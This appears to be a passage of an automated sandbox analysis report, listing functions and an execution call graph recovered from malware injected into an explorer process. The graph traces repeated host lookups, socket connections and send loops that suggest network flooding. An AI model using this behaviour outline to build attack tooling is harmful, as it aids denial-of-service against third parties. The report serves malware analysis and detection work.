                              • Part of subcall function 003A1FFD: FileTimeToDosDateTime.KERNEL32(?,?), ref: 003A2039
                              • Part of subcall function 003A1FFD: FindClose.KERNEL32(00000000,?,?,?), ref: 003A2040
                              • Part of subcall function 003A1F54: lstrlenW.KERNEL32 ref: 003A1F5E
                              • Part of subcall function 003A1F54: _malloc.LIBCMT ref: 003A1F7B
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?), ref: 003A2102
                            • _malloc.LIBCMT ref: 003A2110
                              • Part of subcall function 003AAD7B: __FF_MSGBANNER.LIBCMT ref: 003AAD92
                              • Part of subcall function 003AAD7B: __NMSG_WRITE.LIBCMT ref: 003AAD99
                              • Part of subcall function 003AAD7B: RtlAllocateHeap.NTDLL(00750000,00000000,00000001), ref: 003AADBE
                            • ReadFile.KERNEL32(00000000,00000000,0000FFFF,?,00000000), ref: 003A2129
                            • _free.LIBCMT ref: 003A214E
                            • CloseHandle.KERNEL32(00000000), ref: 003A2155
                            • _free.LIBCMT ref: 003A216B
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: File$Time$Close$CreateFindHandle_free_malloc$AllocateCombineDateFirstHeapLocalPathRead_memsetlstrlen
                            • String ID:
                            • API String ID: 2641817564-0
                            • Opcode ID: e77bd49733eeca369644548fc3e8c2ded120e7a417ee4291e959285d4575c147
                            • Instruction ID: 0832a2728ec7d1de7eaa3a44f8c03b80839e1814ef17623ef13199ec4cfc2c65
                            • Opcode Fuzzy Hash: e77bd49733eeca369644548fc3e8c2ded120e7a417ee4291e959285d4575c147
                            • Instruction Fuzzy Hash: 1031B672604341ABC722EB29DC85E5F77ACEFC6714F004A1CFA59D7191EA34D905CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A7CDD Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __init_pointers.LIBCMT ref: 003A7CDD
                              • Part of subcall function 003A803C: RtlEncodePointer.NTDLL(00000000), ref: 003A803F
                              • Part of subcall function 003A803C: __initp_misc_winsig.LIBCMT ref: 003A805A
                              • Part of subcall function 003A803C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003A8A94
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003A8AA8
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003A8ABB
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003A8ACE
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003A8AE1
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003A8AF4
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003A8B07
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003A8B1A
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003A8B2D
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003A8B40
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003A8B53
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003A8B66
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003A8B79
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003A8B8C
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003A8B9F
                              • Part of subcall function 003A803C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003A8BB2
                            • __mtinitlocks.LIBCMT ref: 003A7CE2
                            • __mtterm.LIBCMT ref: 003A7CEB
                              • Part of subcall function 003A7D53: RtlDeleteCriticalSection.NTDLL ref: 003AA0B9
                              • Part of subcall function 003A7D53: _free.LIBCMT ref: 003AA0C0
                              • Part of subcall function 003A7D53: RtlDeleteCriticalSection.NTDLL( ;), ref: 003AA0E2
                            • __calloc_crt.LIBCMT ref: 003A7D10
                            • __initptd.LIBCMT ref: 003A7D32
                            • GetCurrentThreadId.KERNEL32 ref: 003A7D39
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                            • String ID:
                            • API String ID: 3567560977-0
                            • Opcode ID: f09108a4ddc39b99b76ee704ce8f84054092a418f29d374a88bb95036b6dc003
                            • Instruction ID: 64a58510b882f9e28cba7e7bd62c95eed47622b09bd37c585a974d267e616f89
                            • Opcode Fuzzy Hash: f09108a4ddc39b99b76ee704ce8f84054092a418f29d374a88bb95036b6dc003
                            • Instruction Fuzzy Hash: 98F0B43211D7112AE22B7B747C4366B3789EF53774F21072AF8A9CC0E1FF2088428291
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A377D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _free_mallocwcsncpy
                            • String ID: .z%02d
                            • API String ID: 3842812274-724465191
                            • Opcode ID: fb072c29455a890c321215f764381bdc7cbeac74697f859277a26630e67abdc3
                            • Instruction ID: 356ec1668fda8426629f4cddd7fd0e79aa82e78d350820d53da04b437a07edfa
                            • Opcode Fuzzy Hash: fb072c29455a890c321215f764381bdc7cbeac74697f859277a26630e67abdc3
                            • Instruction Fuzzy Hash: 591182B2904218BBCB029F58DC85EBEB76CEF06724F504159FD029B201DB36AA1096F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A3B55 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _free_mallocstrncpy
                            • String ID: .z%02u
                            • API String ID: 854628082-1100895957
                            • Opcode ID: a38c09427899468a074f9bbf0a07e5d78b36cab22212c14cffb5b8b9b6a55b62
                            • Instruction ID: 8529c7b1740d01009897bc6f7e2fe4090b87a8a7375c767b74ac9638bde33714
                            • Opcode Fuzzy Hash: a38c09427899468a074f9bbf0a07e5d78b36cab22212c14cffb5b8b9b6a55b62
                            • Instruction Fuzzy Hash: 3F014732501B24AFDB235F58CC45D7BBBAEEF46B14B40082DFD569B611D731AE1086B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003B20CA Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                            • String ID:
                            • API String ID: 1559183368-0
                            • Opcode ID: d4eb1a777f878832786e557e6d3bf7cead3d85c675fbd5e9f08223bff75cf05c
                            • Instruction ID: f38130a9b82454d1652b8125894e491d3858d4ea039c40bfcd07aa33928e2265
                            • Opcode Fuzzy Hash: d4eb1a777f878832786e557e6d3bf7cead3d85c675fbd5e9f08223bff75cf05c
                            • Instruction Fuzzy Hash: 1651D330A006059FDB269FADC8816EF77B5EF41328F258B29FA359AAD0D7709D51CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003AAE0D Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 003AAE19
                              • Part of subcall function 003AAD7B: __FF_MSGBANNER.LIBCMT ref: 003AAD92
                              • Part of subcall function 003AAD7B: __NMSG_WRITE.LIBCMT ref: 003AAD99
                              • Part of subcall function 003AAD7B: RtlAllocateHeap.NTDLL(00750000,00000000,00000001), ref: 003AADBE
                            • _free.LIBCMT ref: 003AAE2C
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: AllocateHeap_free_malloc
                            • String ID:
                            • API String ID: 1020059152-0
                            • Opcode ID: b56c5ac18bd0c9af61cea763005f6e43662b1419cd7209d1ec2761bbe04dd0a3
                            • Instruction ID: 4b73043b9d915e977ace49b44ca209b5aa845c28d12a0c0ee60cb5833d85eff6
                            • Opcode Fuzzy Hash: b56c5ac18bd0c9af61cea763005f6e43662b1419cd7209d1ec2761bbe04dd0a3
                            • Instruction Fuzzy Hash: C8117333905A15AACB233FB4AC05B9B379CDF1A364F114926F9499E151DF358D80C6E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A2E0B Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327COMMONLIBRARYCODE
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: g!:$g!:$1:
                            • API String ID: 0-3433116473
                            • Opcode ID: bf06aed01965486eb133facebbb277dbe31ac982ec59f1c455618fd091d21965
                            • Instruction ID: 563c495209bb14c629a6d3b6ad98d5b8dd1e4fdb1382ffca783453aa221b66dc
                            • Opcode Fuzzy Hash: bf06aed01965486eb133facebbb277dbe31ac982ec59f1c455618fd091d21965
                            • Instruction Fuzzy Hash: 0AC1D474700602AFDB2ADB79C841BFAF365FF46714F104229F5699B2C1DBB0A991CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A9895 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003A7BA3: __getptd_noexit.LIBCMT ref: 003A7BA4
                              • Part of subcall function 003A7BA3: __amsg_exit.LIBCMT ref: 003A7BB1
                            • __amsg_exit.LIBCMT ref: 003A98C6
                            • __lock.LIBCMT ref: 003A98D6
                            • _free.LIBCMT ref: 003A9903
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: __amsg_exit$__getptd_noexit__lock_free
                            • String ID: *u
                            • API String ID: 3054295789-2872433927
                            • Opcode ID: 18423245145465fe76954c627d086c3d773b128fbd75a1b48e57de1c7de813d1
                            • Instruction ID: ab2112147e47134ac4e2e3793aef8b2047c05935f1e5002c0e910587f009157a
                            • Opcode Fuzzy Hash: 18423245145465fe76954c627d086c3d773b128fbd75a1b48e57de1c7de813d1
                            • Instruction Fuzzy Hash: 6011A532D05715ABCB23EF68944176EB7A8EB07B24B16021FE420B7281DB785D41CFC5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003B16BC Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B16F2
                            • __isleadbyte_l.LIBCMT ref: 003B1720
                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 003B174E
                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 003B1784
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 75e0797126d5ecd5d78d85e353ed05052ca2e05ffde42b00fee68e155ffe645c
                            • Instruction ID: 417038071c921076fe4ae138a8987f6ae7b3284e2697eb7dabfc2159e0e66c46
                            • Opcode Fuzzy Hash: 75e0797126d5ecd5d78d85e353ed05052ca2e05ffde42b00fee68e155ffe645c
                            • Instruction Fuzzy Hash: E431D235A0024AAFDB228F65C856BFA7BA9FF41358F564129E9148B490DB31D850DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A17C9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 58stringCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,?,00000000,00000000,00000000,00772C2E,003A1CFF,?,?,00000000,?), ref: 003A17E0
                            • lstrcat.KERNEL32(00000002,00772C5B), ref: 003A1812
                            • lstrcat.KERNEL32(0000004E,?), ref: 003A182E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: lstrcat$lstrlen
                            • String ID: `,w
                            • API String ID: 751011610-1086758147
                            • Opcode ID: 3ac1d890a6882745c5ef3a690630234e60ad9c54d11c8e1318fa38464d4dc987
                            • Instruction ID: 6712bb6e4c0017a204c3ae4aa9391318f1355b91b4a1d972e82a5d148f36e622
                            • Opcode Fuzzy Hash: 3ac1d890a6882745c5ef3a690630234e60ad9c54d11c8e1318fa38464d4dc987
                            • Instruction Fuzzy Hash: 19119E766143109BC319DF18D894A6BB7E9EF89354F01062EF90A8B346EB75AC048BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003AD5B6 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction ID: 3e5fd867a656354e46ab1e2a76d88f9d6f2d77ad567edfb9df9deb09b0c40296
                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                            • Instruction Fuzzy Hash: 0001663240004ABBCF175E84DC018EE3F66FB1A354F8A8415FA5A58930D337CAB1AB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 003A3AC0 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.507811708.00000000003A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003A1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_3a1000_explorer.jbxd
                            Similarity
                            • API ID: _malloc$_strlenstrncpy
                            • String ID:
                            • API String ID: 4159901624-0
                            • Opcode ID: 557202e407cc92e8dca2f99fc0d8c86f3a1800c6cb2a170f016ab372054d4542
                            • Instruction ID: 9381cb082784b44d6753ae718a3c34f8463e06dee38dbf2b0a212c870802d9db
                            • Opcode Fuzzy Hash: 557202e407cc92e8dca2f99fc0d8c86f3a1800c6cb2a170f016ab372054d4542
                            • Instruction Fuzzy Hash: 5CE068B3601D327BD3022B6D4C44D0B768CEF8B3523040421F508DB201C7204D0183F1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:10.4%
                            Dynamic/Decrypted Code Coverage:97.7%
                            Signature Coverage:2.8%
                            Total number of Nodes:353
                            Total number of Limit Nodes:4
                            execution_graph 856 31d142c 857 31d1463 856->857 1051 31d2b38 GetProcessHeap RtlAllocateHeap 857->1051 859 31d147a lstrlen RtlMoveMemory 860 31d29bc 2 API calls 859->860 861 31d14a0 gethostbyname 860->861 863 31d15e4 861->863 866 31d14c1 861->866 864 31d2b1a 3 API calls 863->864 865 31d15eb RtlExitUserThread 864->865 868 31d1608 865->868 869 31d1720 RtlExitUserThread 865->869 866->863 867 31d150e inet_ntoa 866->867 1052 31d2b49 RtlRandom 866->1052 1053 31d2297 RtlGetVersion 867->1053 1064 31d2b38 GetProcessHeap RtlAllocateHeap 868->1064 1067 31d2b38 GetProcessHeap RtlAllocateHeap 869->1067 873 31d1739 lstrcat 877 31d29bc 2 API calls 873->877 875 31d1612 lstrlen RtlMoveMemory 879 31d29bc 2 API calls 875->879 881 31d1758 gethostbyname 877->881 878 31d14ea 885 31d29bc 2 API calls 878->885 882 31d1638 gethostbyname 879->882 888 31d1781 881->888 889 31d1820 881->889 891 31d1719 882->891 892 31d1657 882->892 883 31d1532 887 31d2b1a 3 API calls 883->887 890 31d1503 885->890 893 31d15db 887->893 888->889 898 31d179b inet_ntoa 888->898 894 31d2b1a 3 API calls 889->894 890->867 895 31d2b1a 3 API calls 891->895 892->891 896 31d1671 inet_ntoa 892->896 897 31d2b1a 3 API calls 893->897 899 31d1827 RtlExitUserThread 894->899 895->869 900 31d2297 5 API calls 896->900 897->863 1068 31d2b49 RtlRandom 898->1068 1083 31d2b38 GetProcessHeap RtlAllocateHeap 899->1083 904 31d1682 900->904 903 31d183e lstrcat 906 31d29bc 2 API calls 903->906 1065 31d2b49 RtlRandom 904->1065 905 31d17b1 1069 31d2b38 GetProcessHeap RtlAllocateHeap 905->1069 909 31d1859 gethostbyname 906->909 916 31d187e 909->916 917 31d18d3 909->917 910 31d168e 1066 31d2b38 GetProcessHeap RtlAllocateHeap 910->1066 912 31d1815 915 31d2b1a 3 API calls 912->915 914 31d16a3 923 31d2b1a 3 API calls 914->923 915->889 916->917 922 31d1890 inet_ntoa 916->922 919 31d2b1a 3 API calls 917->919 921 31d18da RtlExitUserThread 919->921 1086 31d2b38 GetProcessHeap RtlAllocateHeap 921->1086 922->917 939 31d18a3 922->939 925 31d1710 923->925 928 31d2b1a 3 API calls 925->928 926 31d1804 Sleep 926->912 935 31d17bb 926->935 927 31d18f1 lstrcat 930 31d29bc 2 API calls 927->930 928->891 932 31d1910 gethostbyname 930->932 938 31d193b 932->938 968 31d19f3 932->968 935->912 935->926 1070 31d1fe9 socket 935->1070 1071 31d1f98 RtlZeroMemory htons inet_addr connect 935->1071 1072 31d28d8 935->1072 1076 31d1f61 935->1076 1080 31d1f10 935->1080 938->968 1087 31d2b38 GetProcessHeap RtlAllocateHeap 938->1087 940 31d18c2 Sleep 939->940 942 31d1f10 2 API calls 939->942 1084 31d1fe9 socket 939->1084 1085 31d1f98 RtlZeroMemory htons inet_addr connect 939->1085 940->917 940->939 941 31d2b1a 3 API calls 943 31d19fb RtlExitUserThread 941->943 942->940 947 31d1a18 943->947 946 31d195e htons 1088 31d2b49 RtlRandom 946->1088 1090 31d2b38 GetProcessHeap RtlAllocateHeap 947->1090 948 31d1a2f lstrlen RtlMoveMemory 951 31d29bc 2 API calls 948->951 950 31d1986 1089 31d2b38 GetProcessHeap RtlAllocateHeap 950->1089 953 31d1a59 gethostbyname 951->953 959 31d1bae 953->959 969 31d1a7a 953->969 954 31d1995 955 31d19e1 954->955 957 31d19a4 socket 954->957 958 31d2b1a 3 API calls 955->958 960 31d28d8 RtlRandom 957->960 962 31d19ec 958->962 961 31d2b1a 3 API calls 959->961 963 31d19bb sendto 960->963 964 31d1bb5 RtlExitUserThread 961->964 965 31d2b1a 3 API calls 962->965 966 31d1f10 2 API calls 963->966 967 31d1bd0 964->967 965->968 971 31d19d0 Sleep 966->971 1095 31d2b38 GetProcessHeap RtlAllocateHeap 967->1095 968->941 969->959 970 31d1ac7 inet_ntoa 969->970 1091 31d2b49 RtlRandom 969->1091 972 31d2297 5 API calls 970->972 971->955 971->957 976 31d1add 972->976 974 31d1be7 lstrlen RtlMoveMemory 977 31d29bc 2 API calls 974->977 1092 31d2b49 RtlRandom 976->1092 980 31d1c0d gethostbyname 977->980 978 31d1aa3 984 31d29bc 2 API calls 978->984 986 31d1d8a 980->986 993 31d1c2e 980->993 981 31d1ae9 1093 31d2b38 GetProcessHeap RtlAllocateHeap 981->1093 987 31d1abc 984->987 985 31d1b00 1094 31d2aec VirtualAlloc 985->1094 990 31d2b1a 3 API calls 986->990 987->970 989 31d1b0b 996 31d2b1a 3 API calls 989->996 991 31d1d91 RtlExitUserThread 990->991 992 31d1dab 991->992 1106 31d2b38 GetProcessHeap RtlAllocateHeap 992->1106 993->986 994 31d1c7b inet_ntoa 993->994 1096 31d2b49 RtlRandom 993->1096 995 31d2297 5 API calls 994->995 998 31d1c91 995->998 999 31d1b9c 996->999 1097 31d2b49 RtlRandom 998->1097 1003 31d2b1a 3 API calls 999->1003 1001 31d1dc2 lstrlen RtlMoveMemory 1005 31d29bc 2 API calls 1001->1005 1007 31d1ba5 1003->1007 1004 31d1c57 1012 31d29bc 2 API calls 1004->1012 1008 31d1de8 gethostbyname 1005->1008 1006 31d1c9f 1098 31d2b38 GetProcessHeap RtlAllocateHeap 1006->1098 1010 31d2b1a 3 API calls 1007->1010 1014 31d1f00 1008->1014 1020 31d1e09 1008->1020 1010->959 1011 31d1cae 1099 31d2b38 GetProcessHeap RtlAllocateHeap 1011->1099 1016 31d1c70 1012->1016 1017 31d2b1a 3 API calls 1014->1017 1016->994 1018 31d1f07 RtlExitUserThread 1017->1018 1019 31d1d6f 1023 31d2b1a 3 API calls 1019->1023 1020->1014 1021 31d1e56 inet_ntoa 1020->1021 1107 31d2b49 RtlRandom 1020->1107 1025 31d2297 5 API calls 1021->1025 1026 31d1d7a 1023->1026 1024 31d1cbe 1024->1019 1036 31d1d5a Sleep 1024->1036 1037 31d1ce7 RtlZeroMemory wsprintfA 1024->1037 1100 31d1fe9 socket 1024->1100 1101 31d1f98 RtlZeroMemory htons inet_addr connect 1024->1101 1030 31d1e6c 1025->1030 1027 31d2b1a 3 API calls 1026->1027 1031 31d1d81 1027->1031 1108 31d2b49 RtlRandom 1030->1108 1035 31d2b1a 3 API calls 1031->1035 1032 31d1e32 1041 31d29bc 2 API calls 1032->1041 1034 31d1e78 1109 31d2b38 GetProcessHeap RtlAllocateHeap 1034->1109 1035->986 1036->1019 1036->1024 1038 31d1f61 send 1037->1038 1046 31d1d20 1038->1046 1040 31d1e8d 1045 31d2b1a 3 API calls 1040->1045 1043 31d1e4b 1041->1043 1042 31d28d8 RtlRandom 1042->1046 1043->1021 1044 31d1f61 send 1044->1046 1047 31d1ef7 1045->1047 1046->1042 1046->1044 1050 31d1f10 2 API calls 1046->1050 1102 31d1f2a 1046->1102 1048 31d2b1a 3 API calls 1047->1048 1048->1014 1050->1036 1051->859 1052->878 1054 31d22bb 1053->1054 1055 31d1524 1053->1055 1110 31d2b38 GetProcessHeap RtlAllocateHeap 1054->1110 1063 31d2b38 GetProcessHeap RtlAllocateHeap 1055->1063 1057 31d22c6 1111 31d2b49 RtlRandom 1057->1111 1059 31d22dd 1112 31d2b49 RtlRandom 1059->1112 1062 31d22e7 wsprintfA 1062->1055 1063->883 1064->875 1065->910 1066->914 1067->873 1068->905 1069->935 1070->935 1071->935 1073 31d28e5 1072->1073 1074 31d28f7 1072->1074 1073->1074 1113 31d2b49 RtlRandom 1073->1113 1074->935 1077 31d1f70 send 1076->1077 1079 31d1f8c 1076->1079 1078 31d1f88 1077->1078 1077->1079 1078->1077 1078->1079 1079->935 1081 31d1f28 1080->1081 1082 31d1f18 shutdown closesocket 1080->1082 1081->926 1082->1081 1083->903 1084->939 1085->939 1086->927 1087->946 1088->950 1089->954 1090->948 1091->978 1092->981 1093->985 1094->989 1095->974 1096->1004 1097->1006 1098->1011 1099->1024 1100->1024 1101->1024 1103 31d1f35 recv 1102->1103 1104 31d1f4d 1103->1104 1105 31d1f55 1103->1105 1104->1103 1104->1105 1105->1046 1106->1001 1107->1032 1108->1034 1109->1040 1110->1057 1111->1059 1112->1062 1113->1073 1114 31d1ff6 1150 31d2b38 GetProcessHeap RtlAllocateHeap 1114->1150 1116 31d2009 1117 31d23c2 18 API calls 1116->1117 1118 31d201d 1117->1118 1119 31d2274 1118->1119 1121 31d290c 2 API calls 1118->1121 1153 31d2add VirtualFree 1119->1153 1123 31d2037 1121->1123 1122 31d227f 1124 31d228b 1122->1124 1126 31d2b1a 3 API calls 1122->1126 1151 31d2b38 GetProcessHeap RtlAllocateHeap 1123->1151 1126->1124 1127 31d203f RtlMoveMemory CharLowerA 1152 31d2b38 GetProcessHeap RtlAllocateHeap 1127->1152 1129 31d2065 1130 31d29bc 2 API calls 1129->1130 1131 31d2075 1130->1131 1132 31d207a lstrlen 1131->1132 1133 31d2082 RtlMoveMemory 1131->1133 1132->1133 1134 31d2264 1133->1134 1147 31d209d 1133->1147 1135 31d2b1a 3 API calls 1134->1135 1136 31d226b 1135->1136 1137 31d2b1a 3 API calls 1136->1137 1137->1119 1138 31d29bc lstrlen lstrlen 1138->1147 1139 31d2144 RtlZeroMemory RtlMoveMemory 1140 31d29bc 2 API calls 1139->1140 1142 31d216f 1140->1142 1141 31d21a9 RtlMoveMemory 1141->1142 1143 31d21e5 wsprintfA 1141->1143 1142->1141 1142->1143 1144 31d29bc lstrlen lstrlen 1142->1144 1145 31d21c6 wsprintfA 1142->1145 1148 31d21a0 lstrlen 1142->1148 1146 31d21fb lstrlen lstrlen 1143->1146 1144->1142 1145->1146 1146->1147 1147->1134 1147->1138 1147->1139 1149 31d290c 2 API calls 1147->1149 1148->1141 1149->1147 1150->1116 1151->1127 1152->1129 1153->1122 706 31d1000 707 31d1007 706->707 708 31d1010 706->708 710 31d1016 707->710 719 31d2947 VirtualQuery 710->719 713 31d102e 713->708 714 31d1033 WSAStartup 721 31d2b38 GetProcessHeap RtlAllocateHeap 714->721 716 31d104d RtlMoveMemory NtUnmapViewOfSection 722 31d106e 716->722 720 31d102a 719->720 720->713 720->714 721->716 742 31d2b5f GetTickCount 722->742 724 31d107a 743 31d2b38 GetProcessHeap RtlAllocateHeap 724->743 726 31d1084 744 31d2b38 GetProcessHeap RtlAllocateHeap 726->744 728 31d1093 745 31d2b38 GetProcessHeap RtlAllocateHeap 728->745 730 31d10a0 wsprintfA 734 31d10c4 730->734 732 31d1133 Sleep 732->734 733 31d29bc lstrlen lstrlen 733->734 734->732 734->733 736 31d1102 734->736 746 31d2990 OpenFileMappingA 734->746 749 31d297d UnmapViewOfFile FindCloseChangeNotification 734->749 750 31d2b38 GetProcessHeap RtlAllocateHeap 736->750 738 31d110b RtlMoveMemory 751 31d1140 738->751 742->724 743->726 744->728 745->730 747 31d29a4 MapViewOfFile 746->747 748 31d29b7 746->748 747->748 748->734 749->732 750->738 752 31d1156 lstrlen 751->752 767 31d111d 751->767 753 31d116c RtlZeroMemory 752->753 752->767 754 31d1183 753->754 762 31d11d3 753->762 757 31d119a RtlZeroMemory RtlMoveMemory 754->757 754->762 775 31d29bc lstrlen lstrlen 754->775 756 31d120d WaitForMultipleObjects 758 31d122f CloseHandle 756->758 759 31d1243 RtlZeroMemory 756->759 777 31d290c 757->777 758->758 758->759 781 31d234d 759->781 761 31d1331 766 31d234d 19 API calls 761->766 762->756 762->761 763 31d129c lstrlen RtlComputeCrc32 762->763 764 31d12fa lstrlen RtlComputeCrc32 762->764 762->767 769 31d12dc CreateThread 762->769 788 31d2add VirtualFree 762->788 763->762 764->756 764->762 766->767 770 31d2b1a 767->770 769->762 771 31d2947 VirtualQuery 770->771 772 31d2b22 771->772 773 31d2b36 772->773 774 31d2b26 GetProcessHeap HeapFree 772->774 773->734 774->773 776 31d29dd 775->776 776->754 778 31d291a lstrlen RtlMoveMemory 777->778 779 31d2944 777->779 778->779 779->754 789 31d2b38 GetProcessHeap RtlAllocateHeap 781->789 783 31d2365 lstrcat 790 31d23c2 783->790 786 31d2b1a 3 API calls 787 31d23b8 786->787 787->762 788->762 789->783 824 31d278b 790->824 794 31d23f0 829 31d2ab9 lstrlen MultiByteToWideChar 794->829 796 31d23ff 830 31d2848 RtlZeroMemory 796->830 799 31d276d 801 31d2b1a 3 API calls 799->801 800 31d2451 RtlZeroMemory 803 31d2485 800->803 802 